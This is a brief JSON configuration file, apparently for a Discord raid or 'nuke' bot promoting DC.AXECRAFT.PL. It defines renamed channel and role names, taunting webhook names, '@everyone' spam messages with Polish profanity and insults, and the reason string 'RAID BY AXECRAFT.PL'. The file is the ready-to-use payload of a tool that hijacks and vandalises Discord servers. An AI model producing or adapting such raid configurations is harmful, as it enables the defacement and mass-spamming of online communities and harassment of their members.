{
 "prefix" : "$",
 "channel_names" : ["DC.AXECRAFT.PL", "NAJLEPSZY POLSKI SERWER DC.AXECRAFT.PL", "WYPIERDALAC Z TEGO GÓWNA! ZAPRASZAM NA DC.AXECRAFT.PL", "LOOOOSER! DONT CRY BABY ;( ZAPRASZAM NA DC.AXECRAFT.PL"],
 "roles_name" : ["DC.AXECRAFT.PL Are Cool", "DC.AXECRAFT.PL", "DC.AXECRAFT.PL On Top", "DC.AXECRAFT.PL On Fire"],
 "webhooknames" : ["Fucked By TheAxes", "Siezed By TheAxes"],
 "spam_text" : ["@everyone DC.AXECRAFT.PL", "@everyone NAJLEPSZY POLSKI SERWER DC.AXECRAFT.PL", "@everyone WYPIERDALAC Z TEGO GÓWNA! ZAPRASZAM NA DC.AXECRAFT.PL", "@everyone LOOOOSER! DONT CRY BABY ;( ZAPRASZAM NA DC.AXECRAFT.PL"],
 "reason" : "RAID BY AXECRAFT.PL"
 } 